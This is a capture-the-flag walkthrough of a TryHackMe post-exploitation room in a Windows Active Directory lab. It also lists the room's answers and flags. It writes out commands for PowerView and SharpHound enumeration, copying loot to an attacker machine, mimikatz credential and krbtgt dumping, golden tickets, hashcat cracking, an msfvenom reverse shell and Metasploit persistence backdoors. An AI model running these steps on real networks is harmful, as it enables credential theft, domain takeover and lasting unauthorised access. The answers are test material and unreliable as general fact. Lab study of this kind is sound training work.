TryHackMe: Post-Exploitation Basics

Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom

Your machine IP is MACHINE_IP

Username: Administrator

Password: P@$$W0rd

Domain Name: CONTROLLER

Some steps done in this section

1.) Start Powershell - powershell -ep bypass -ep bypasses the execution policy of PowerShell allowing you to easily run scripts

2.) Start PowerView - . .\Downloads\PowerView.ps1

3.) Enumerate the domain users - Get-NetUser | select cn

4.) Enumerate the domain groups - Get-NetGroup -GroupName *admin*

Q. What is the shared folder that is not set by default?

Hint: Invoke-ShareFinder

Ans: share

Q.What operating system is running inside of the network besides Windows Server 2019?

Hint: Get-NetComputer -fulldata | select operatingsystem

ANS: Windows 10 Enterprise Evaluation

Q. I've hidden a flag inside of the users find it

Hint: Get-NetUser | select cn

Ans: POST{P0W3RV13W_FTW}

Bloodhound is a graphical interface that allows you to visually map out the network. This tool along with SharpHound which is similar to PowerView takes the user, groups, trusts, etc. of the network and collects them into .json files to be used inside of Bloodhound.

BloodHound Installation -

1.) apt-get install bloodhound

2.) neo4j console - default credentials -> neo4j:neo4j

Getting loot w/ SharpHound -

1.) powershell -ep bypass same as with PowerView

2.) . .\Downloads\SharpHound.ps1

3.) Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

4.) To copy to your attacker machine i.e kali: scp .\20200609093439_loot.zip root@kali_ip:/root/loot.zip

Note: This file: 20200609093439_loot.zip is output from number 3.

5.)Now import loot.zip in bloodhound in attacker machine i.e kali machine

If you are asked credentials: use default credentials -> neo4j:neo4j

If you want you can dig all information according to requirements.

Q. What service is also a domain admin

Hint: Choose Queries then Find All Domain Admins

Ans: sqlservice

Q. What two users are Kerberoastable?

Hint: Choose queries then list all kerberoastable users

Ans: sqlservice, krbtgt

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of an active directory network

Dump Hashes w/ mimikatz

1.) cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary

2.) privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly

3.) lsadump::lsa /patch Dump those hashes

Crack those hashes w/ hashcat

hashcat -m 1000 <hash> rockyou.txt

or

you can use tools like crackstation.

Q. What is the Machine1 Password?

Ans:Password1

Q. What is the Machine2 Hash?

Ans: c39f2beb3d2ec06a62cb887fb391dee0

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.

Dump the krbtgt Hash -

1.) cd downloads && mimikatz.exe

2.) privilege::debug ensure this outputs [privilege "20" ok]

3.) lsadump::lsa /inject /name:krbtgt This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket

Create a Golden Ticket -

1.) kerberos::golden /user: Administrator /domain: from 3/sid: from 3 /krbtgt: from 3/id: from 3

Use the Golden Ticket to access other machines -

1.) misc::cmd - This will open a new command prompt with elevated privileges to all machines

2.) Access other Machines! - You will now have another command prompt with access to all other machines on the network

Connect to the VM w/ RDP:

Your machine IP is -------

Username: Administrator

Password: P@$$W0rd

Domain Name: CONTROLLER

In manage tab, just navigate to the tools tab and select the Active Directory Users and Computers. This will pull up a list of all users on the domain as well as some other useful tabs to use such as groups and computers. Just play with those user descriptions.

Q. What tool allows to view the event logs?

Eventviewer

Q. What is the SQL Service password?

Mypassword123#

Generating a Payload w/ msfvenom

1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe this will generate a basic windows meterpreter reverse tcp shell

2.) Transfer the payload from your attacker machine to the target machine.

3.) use exploit/multi/handler - this will create a listener on the port that you set it on.

4.) Configure our payload to be a windows meterpreter shell: set payload windows/meterpreter/reverse_tcp

5.) After setting your THM IP address as your "LHOST", start the listener with run

6.) Executing the binary on the windows machine will give you a meterpreter shell back on your host - let's return to that

7.) Verify that we've got a meterpreter shell, where we will then background it to run the persistence module.

Run the Persistence Module

1.) use exploit/windows/local/persistence this module will send a payload every 10 seconds in default however you can set this time to anything you want

2.) set session 1 set the session to the session that we backgrounded in meterpreter (you can use the sessions command in metasploit to list the active sessions)

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to windows/meterpreter/reverse_tcp allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.

This is it. Follow each command you will get your answers as expected. If something went wrong, please contact us.